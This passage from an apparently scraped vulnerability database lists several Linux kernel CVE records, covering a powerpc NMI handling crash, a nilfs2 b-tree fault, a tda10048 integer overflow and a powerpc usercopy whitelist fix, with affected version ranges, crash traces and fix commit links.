"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc: Avoid nmi_enter/nmi_exit in real mode interrupt.\n\nnmi_enter()/nmi_exit() touches per cpu variables which can lead to kernel\ncrash when invoked during real mode interrupt handling (e.g. early HMI/MCE\ninterrupt handler) if percpu allocation comes from vmalloc area.\n\nEarly HMI/MCE handlers are called through DEFINE_INTERRUPT_HANDLER_NMI()\nwrapper which invokes nmi_enter/nmi_exit calls. We don\u0027t see any issue when\npercpu allocation is from the embedded first chunk. However with\nCONFIG_NEED_PER_CPU_PAGE_FIRST_CHUNK enabled there are chances where percpu\nallocation can come from the vmalloc area.\n\nWith kernel command line \"percpu_alloc=page\" we can force percpu allocation\nto come from vmalloc area and can see kernel crash in machine_check_early:\n\n[ 1.215714] NIP [c000000000e49eb4] rcu_nmi_enter+0x24/0x110\n[ 1.215717] LR [c0000000000461a0] machine_check_early+0xf0/0x2c0\n[ 1.215719] --- interrupt: 200\n[ 1.215720] [c000000fffd73180] [0000000000000000] 0x0 (unreliable)\n[ 1.215722] [c000000fffd731b0] [0000000000000000] 0x0\n[ 1.215724] [c000000fffd73210] [c000000000008364] machine_check_early_common+0x134/0x1f8\n\nFix this by avoiding use of nmi_enter()/nmi_exit() in real mode if percpu\nfirst chunk is not embedded."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:12:58.986Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fb6675db04c4b79883373edc578d5df7bbc84848"
},
{
"url": "https://git.kernel.org/stable/c/e2afb26615adf6c3ceaaa7732aa839bcd587a057"
},
{
"url": "https://git.kernel.org/stable/c/8d3f83dfb23674540c827a8d65fba20aa300b252"
},
{
"url": "https://git.kernel.org/stable/c/0f37946c62c48a907625348cbc720a7a0c547d1e"
},
{
"url": "https://git.kernel.org/stable/c/2c78c9411e685dbc9eac8c2845111b03501975b8"
},
{
"url": "https://git.kernel.org/stable/c/0db880fc865ffb522141ced4bfa66c12ab1fbb70"
}
],
"title": "powerpc: Avoid nmi_enter/nmi_exit in real mode interrupt.",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42126",
"datePublished": "2024-07-30T07:46:23.179Z",
"dateReserved": "2024-07-29T15:50:41.179Z",
"dateUpdated": "2025-05-21T09:12:58.986Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52900 (GCVE-0-2023-52900)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix general protection fault in nilfs_btree_insert()
If nilfs2 reads a corrupted disk image and tries to reads a b-tree node
block by calling __nilfs_btree_get_block() against an invalid virtual
block address, it returns -ENOENT because conversion of the virtual block
address to a disk block address fails. However, this return value is the
same as the internal code that b-tree lookup routines return to indicate
that the block being searched does not exist, so functions that operate on
that b-tree may misbehave.
When nilfs_btree_insert() receives this spurious 'not found' code from
nilfs_btree_do_lookup(), it misunderstands that the 'not found' check was
successful and continues the insert operation using incomplete lookup path
data, causing the following crash:
general protection fault, probably for non-canonical address
0xdffffc0000000005: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f]
...
RIP: 0010:nilfs_btree_get_nonroot_node fs/nilfs2/btree.c:418 [inline]
RIP: 0010:nilfs_btree_prepare_insert fs/nilfs2/btree.c:1077 [inline]
RIP: 0010:nilfs_btree_insert+0x6d3/0x1c10 fs/nilfs2/btree.c:1238
Code: bc 24 80 00 00 00 4c 89 f8 48 c1 e8 03 42 80 3c 28 00 74 08 4c 89
ff e8 4b 02 92 fe 4d 8b 3f 49 83 c7 28 4c 89 f8 48 c1 e8 03 <42> 80 3c
28 00 74 08 4c 89 ff e8 2e 02 92 fe 4d 8b 3f 49 83 c7 02
...
Call Trace:
<TASK>
nilfs_bmap_do_insert fs/nilfs2/bmap.c:121 [inline]
nilfs_bmap_insert+0x20d/0x360 fs/nilfs2/bmap.c:147
nilfs_get_block+0x414/0x8d0 fs/nilfs2/inode.c:101
__block_write_begin_int+0x54c/0x1a80 fs/buffer.c:1991
__block_write_begin fs/buffer.c:2041 [inline]
block_write_begin+0x93/0x1e0 fs/buffer.c:2102
nilfs_write_begin+0x9c/0x110 fs/nilfs2/inode.c:261
generic_perform_write+0x2e4/0x5e0 mm/filemap.c:3772
__generic_file_write_iter+0x176/0x400 mm/filemap.c:3900
generic_file_write_iter+0xab/0x310 mm/filemap.c:3932
call_write_iter include/linux/fs.h:2186 [inline]
new_sync_write fs/read_write.c:491 [inline]
vfs_write+0x7dc/0xc50 fs/read_write.c:584
ksys_write+0x177/0x2a0 fs/read_write.c:637
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x63/0xcd
...
</TASK>
This patch fixes the root cause of this problem by replacing the error
code that __nilfs_btree_get_block() returns on block address conversion
failure from -ENOENT to another internal code -EINVAL which means that the
b-tree metadata is corrupted.
By returning -EINVAL, it propagates without glitches, and for all relevant
b-tree operations, functions in the upper bmap layer output an error
message indicating corrupted b-tree metadata via
nilfs_bmap_convert_error(), and code -EIO will be eventually returned as
it should be.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52900",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:31.052227Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:15.051Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/btree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3c2a2ff67d46106715c2132021b98bd057c27545",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d9fde9eab1766170ff2ade67d09178d2cfd78749",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b0ba060d3287108eba17603bee3810e4cf2c272d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "712bd74eccb9d3626a0a236641962eca8e11a243",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "45627a1a6450662e1e0f8174ef07b05710a20062",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0bf463939c09e5b2c35c71ed74a5fd60a74d6a04",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7633355e5c7f29c049a9048e461427d1d8ed3051",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/btree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.304",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.304",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.271",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix general protection fault in nilfs_btree_insert()\n\nIf nilfs2 reads a corrupted disk image and tries to reads a b-tree node\nblock by calling __nilfs_btree_get_block() against an invalid virtual\nblock address, it returns -ENOENT because conversion of the virtual block\naddress to a disk block address fails. However, this return value is the\nsame as the internal code that b-tree lookup routines return to indicate\nthat the block being searched does not exist, so functions that operate on\nthat b-tree may misbehave.\n\nWhen nilfs_btree_insert() receives this spurious \u0027not found\u0027 code from\nnilfs_btree_do_lookup(), it misunderstands that the \u0027not found\u0027 check was\nsuccessful and continues the insert operation using incomplete lookup path\ndata, causing the following crash:\n\n general protection fault, probably for non-canonical address\n 0xdffffc0000000005: 0000 [#1] PREEMPT SMP KASAN\n KASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f]\n ...\n RIP: 0010:nilfs_btree_get_nonroot_node fs/nilfs2/btree.c:418 [inline]\n RIP: 0010:nilfs_btree_prepare_insert fs/nilfs2/btree.c:1077 [inline]\n RIP: 0010:nilfs_btree_insert+0x6d3/0x1c10 fs/nilfs2/btree.c:1238\n Code: bc 24 80 00 00 00 4c 89 f8 48 c1 e8 03 42 80 3c 28 00 74 08 4c 89\n ff e8 4b 02 92 fe 4d 8b 3f 49 83 c7 28 4c 89 f8 48 c1 e8 03 \u003c42\u003e 80 3c\n 28 00 74 08 4c 89 ff e8 2e 02 92 fe 4d 8b 3f 49 83 c7 02\n ...\n Call Trace:\n \u003cTASK\u003e\n nilfs_bmap_do_insert fs/nilfs2/bmap.c:121 [inline]\n nilfs_bmap_insert+0x20d/0x360 fs/nilfs2/bmap.c:147\n nilfs_get_block+0x414/0x8d0 fs/nilfs2/inode.c:101\n __block_write_begin_int+0x54c/0x1a80 fs/buffer.c:1991\n __block_write_begin fs/buffer.c:2041 [inline]\n block_write_begin+0x93/0x1e0 fs/buffer.c:2102\n nilfs_write_begin+0x9c/0x110 fs/nilfs2/inode.c:261\n generic_perform_write+0x2e4/0x5e0 mm/filemap.c:3772\n __generic_file_write_iter+0x176/0x400 mm/filemap.c:3900\n generic_file_write_iter+0xab/0x310 mm/filemap.c:3932\n call_write_iter include/linux/fs.h:2186 [inline]\n new_sync_write fs/read_write.c:491 [inline]\n vfs_write+0x7dc/0xc50 fs/read_write.c:584\n ksys_write+0x177/0x2a0 fs/read_write.c:637\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n ...\n \u003c/TASK\u003e\n\nThis patch fixes the root cause of this problem by replacing the error\ncode that __nilfs_btree_get_block() returns on block address conversion\nfailure from -ENOENT to another internal code -EINVAL which means that the\nb-tree metadata is corrupted.\n\nBy returning -EINVAL, it propagates without glitches, and for all relevant\nb-tree operations, functions in the upper bmap layer output an error\nmessage indicating corrupted b-tree metadata via\nnilfs_bmap_convert_error(), and code -EIO will be eventually returned as\nit should be."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:33.986Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3c2a2ff67d46106715c2132021b98bd057c27545"
},
{
"url": "https://git.kernel.org/stable/c/d9fde9eab1766170ff2ade67d09178d2cfd78749"
},
{
"url": "https://git.kernel.org/stable/c/b0ba060d3287108eba17603bee3810e4cf2c272d"
},
{
"url": "https://git.kernel.org/stable/c/712bd74eccb9d3626a0a236641962eca8e11a243"
},
{
"url": "https://git.kernel.org/stable/c/45627a1a6450662e1e0f8174ef07b05710a20062"
},
{
"url": "https://git.kernel.org/stable/c/0bf463939c09e5b2c35c71ed74a5fd60a74d6a04"
},
{
"url": "https://git.kernel.org/stable/c/7633355e5c7f29c049a9048e461427d1d8ed3051"
}
],
"title": "nilfs2: fix general protection fault in nilfs_btree_insert()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52900",
"datePublished": "2024-08-21T06:10:40.533Z",
"dateReserved": "2024-08-21T06:07:11.014Z",
"dateUpdated": "2025-05-04T07:45:33.986Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42223 (GCVE-0-2024-42223)
Vulnerability from cvelistv5
Published
2024-07-30 07:47
Modified
2025-05-21 09:13
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-frontends: tda10048: Fix integer overflow
state->xtal_hz can be up to 16M, so it can overflow a 32 bit integer
when multiplied by pll_mfactor.
Create a new 64 bit variable to hold the calculations.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d114153816ec188b20a37583e66da33d8b2798fe Version: d114153816ec188b20a37583e66da33d8b2798fe Version: d114153816ec188b20a37583e66da33d8b2798fe Version: d114153816ec188b20a37583e66da33d8b2798fe Version: d114153816ec188b20a37583e66da33d8b2798fe Version: d114153816ec188b20a37583e66da33d8b2798fe Version: d114153816ec188b20a37583e66da33d8b2798fe Version: d114153816ec188b20a37583e66da33d8b2798fe |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.557Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8167e4d7dc086d4f7ca7897dcff3827e4d22c99a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c72587d024f087aecec0221eaff2fe850d856ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e1ba22618758e95e09c9fd30c69ccce38edf94c0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bd5620439959a7e02012588c724c6ff5143b80af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1663e2474e4d777187d749a5c90ae83232db32bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ac224e9371dc3c4eb666033e6b42d05cf5184a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1121d8a5c6ed6b8fad492e43b63b386cb6a3a9d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1aa1329a67cc214c3b7bd2a14d1301a795760b07"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42223",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:45.726631Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:07.151Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/dvb-frontends/tda10048.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8167e4d7dc086d4f7ca7897dcff3827e4d22c99a",
"status": "affected",
"version": "d114153816ec188b20a37583e66da33d8b2798fe",
"versionType": "git"
},
{
"lessThan": "5c72587d024f087aecec0221eaff2fe850d856ce",
"status": "affected",
"version": "d114153816ec188b20a37583e66da33d8b2798fe",
"versionType": "git"
},
{
"lessThan": "e1ba22618758e95e09c9fd30c69ccce38edf94c0",
"status": "affected",
"version": "d114153816ec188b20a37583e66da33d8b2798fe",
"versionType": "git"
},
{
"lessThan": "bd5620439959a7e02012588c724c6ff5143b80af",
"status": "affected",
"version": "d114153816ec188b20a37583e66da33d8b2798fe",
"versionType": "git"
},
{
"lessThan": "1663e2474e4d777187d749a5c90ae83232db32bd",
"status": "affected",
"version": "d114153816ec188b20a37583e66da33d8b2798fe",
"versionType": "git"
},
{
"lessThan": "8ac224e9371dc3c4eb666033e6b42d05cf5184a1",
"status": "affected",
"version": "d114153816ec188b20a37583e66da33d8b2798fe",
"versionType": "git"
},
{
"lessThan": "1121d8a5c6ed6b8fad492e43b63b386cb6a3a9d8",
"status": "affected",
"version": "d114153816ec188b20a37583e66da33d8b2798fe",
"versionType": "git"
},
{
"lessThan": "1aa1329a67cc214c3b7bd2a14d1301a795760b07",
"status": "affected",
"version": "d114153816ec188b20a37583e66da33d8b2798fe",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/dvb-frontends/tda10048.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.31"
},
{
"lessThan": "2.6.31",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "2.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.31",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-frontends: tda10048: Fix integer overflow\n\nstate-\u003extal_hz can be up to 16M, so it can overflow a 32 bit integer\nwhen multiplied by pll_mfactor.\n\nCreate a new 64 bit variable to hold the calculations."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:13:03.803Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8167e4d7dc086d4f7ca7897dcff3827e4d22c99a"
},
{
"url": "https://git.kernel.org/stable/c/5c72587d024f087aecec0221eaff2fe850d856ce"
},
{
"url": "https://git.kernel.org/stable/c/e1ba22618758e95e09c9fd30c69ccce38edf94c0"
},
{
"url": "https://git.kernel.org/stable/c/bd5620439959a7e02012588c724c6ff5143b80af"
},
{
"url": "https://git.kernel.org/stable/c/1663e2474e4d777187d749a5c90ae83232db32bd"
},
{
"url": "https://git.kernel.org/stable/c/8ac224e9371dc3c4eb666033e6b42d05cf5184a1"
},
{
"url": "https://git.kernel.org/stable/c/1121d8a5c6ed6b8fad492e43b63b386cb6a3a9d8"
},
{
"url": "https://git.kernel.org/stable/c/1aa1329a67cc214c3b7bd2a14d1301a795760b07"
}
],
"title": "media: dvb-frontends: tda10048: Fix integer overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42223",
"datePublished": "2024-07-30T07:47:04.861Z",
"dateReserved": "2024-07-30T07:40:12.249Z",
"dateUpdated": "2025-05-21T09:13:03.803Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41065 (GCVE-0-2024-41065)
Vulnerability from cvelistv5
Published
2024-07-29 14:57
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/pseries: Whitelist dtl slub object for copying to userspace
Reading the dispatch trace log from /sys/kernel/debug/powerpc/dtl/cpu-*
results in a BUG() when the config CONFIG_HARDENED_USERCOPY is enabled as
shown below.
kernel BUG at mm/usercopy.c:102!
Oops: Exception in kernel mode, sig: 5 [#1]
LE PAGE_SIZE=64K MMU=Radix SMP NR_CPUS=2048 NUMA pSeries
Modules linked in: xfs libcrc32c dm_service_time sd_mod t10_pi sg ibmvfc
scsi_transport_fc ibmveth pseries_wdt dm_multipath dm_mirror dm_region_hash dm_log dm_mod fuse
CPU: 27 PID: 1815 Comm: python3 Not tainted 6.10.0-rc3 #85
Hardware name: IBM,9040-MRX POWER10 (raw) 0x800200 0xf000006 of:IBM,FW1060.00 (NM1060_042) hv:phyp pSeries
NIP: c0000000005d23d4 LR: c0000000005d23d0 CTR: 00000000006ee6f8
REGS: c000000120c078c0 TRAP: 0700 Not tainted (6.10.0-rc3)
MSR: 8000000000029033 <SF,EE,ME,IR,DR,RI,LE> CR: 2828220f XER: 0000000e
CFAR: c0000000001fdc80 IRQMASK: 0
[ ... GPRs omitted ... ]
NIP [c0000000005d23d4] usercopy_abort+0x78/0xb0
LR [c0000000005d23d0] usercopy_abort+0x74/0xb0
Call Trace:
usercopy_abort+0x74/0xb0 (unreliable)
__check_heap_object+0xf8/0x120
check_heap_object+0x218/0x240
__check_object_size+0x84/0x1a4
dtl_file_read+0x17c/0x2c4
full_proxy_read+0x8c/0x110
vfs_read+0xdc/0x3a0
ksys_read+0x84/0x144
system_call_exception+0x124/0x330
system_call_vectored_common+0x15c/0x2ec
--- interrupt: 3000 at 0x7fff81f3ab34
Commit 6d07d1cd300f ("usercopy: Restrict non-usercopy caches to size 0")
requires that only whitelisted areas in slab/slub objects can be copied to
userspace when usercopy hardening is enabled using CONFIG_HARDENED_USERCOPY.
Dtl contains hypervisor dispatch events which are expected to be read by
privileged users. Hence mark this safe for user access.
Specify useroffset=0 and usersize=DISPATCH_LOG_BYTES to whitelist the
entire object.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.323Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a7b952941ce07e1e7a2cafd08c64a98e14f553e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b16098148ea58a67430d90e20476be2377c3acd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e59822f9d700349cd17968d22c979db23a2d347f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ee68686d1e2a5da35d5650be0be1ce06fe2ceb2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e512a59b472684d8585125101ab03b86c2c1348a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f5892212c27be31792ef1daa89c8dac1b3047e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1a14150e1656f7a332a943154fc486504db4d586"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41065",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:21:55.941792Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:58.163Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/pseries/setup.c"
